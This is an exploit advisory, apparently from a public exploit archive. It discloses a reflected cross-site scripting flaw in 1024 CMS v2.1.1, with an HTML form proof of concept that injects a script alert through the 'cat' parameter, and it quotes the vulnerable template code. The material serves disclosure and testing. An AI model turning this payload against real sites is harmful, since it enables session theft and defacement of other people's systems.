*=============================================================|
| Exploit Title: 1024 CMS v2.1.1 Cross Site Scripting
|
| Exploit Author: Ashiyane Digital Security Team
|
| Vendor Homepage: http://1024-cms.soft112.com/
|
| Download Link :https://sourceforge.net/projects/cms-cvi/files/latest/download?source=typ_redirect
|
| Version : v2.1.1
|
| Tested on: Kali Linux
|
| Date: 2 /7 / 2017
*=============================================================|
| Exploit Code:
|
|<HTML>
|<HEAD><TITLE>1024 CMS v2.1.1 Cross Site Scripting</TITLE></HEAD>
|<BODY>
|<form action="http://127.0.0.1/10/v2.1.1/1024/library/hoteditor/show_it.php" method="gwt">
| <input type="hidden" name="cat" value="Mrsly'"/><ScRiPt>alert('M.R.S.L.Y')</ScRiPt>"/>
| <input type="hidden" name="first" value="MRSLY"/>
| <input type="hidden" name="page" value="0"/>
| <input type="hidden" name="step" value="0"/>
|</form>
|</BODY>
|</HTML>
*=======================|
|Vulnerable code :
|
|<table border="0" cellpadding="3" cellspacing="3" style="border-collapse: collapse" width="360" >
| <tr>
| <td width="68%"><font face=verdana size=1>$display_home_more / $cat2 <font color=red>($total_pic)</font></font></td>
| <td width="32%" align="right">$drop_down</td>
| </tr>
|</table>
|
*=============================================================|
| Special Thanks To : Behrooz_Ice، Virangar ,H_SQLI.EMpiRe ، Ehsan Cod3r ،
| Und3rgr0und ، Amir.ght ، xenotix، modiret، V For Vendetta ، Alireza ، micle
| r4ouf ، Net Hacker ، Spoofer ، alcol ، 1TED ، H4554N، shahroukh، Saeid_9n ،
| F.SQLi ، Muts ، HackFans، B14CK SPID3R ، MALWaRE43 ، moh3nra021
| And All Of My Friends ...
| The Last One : My Self, M.R.S.L.Y
*=============================================================|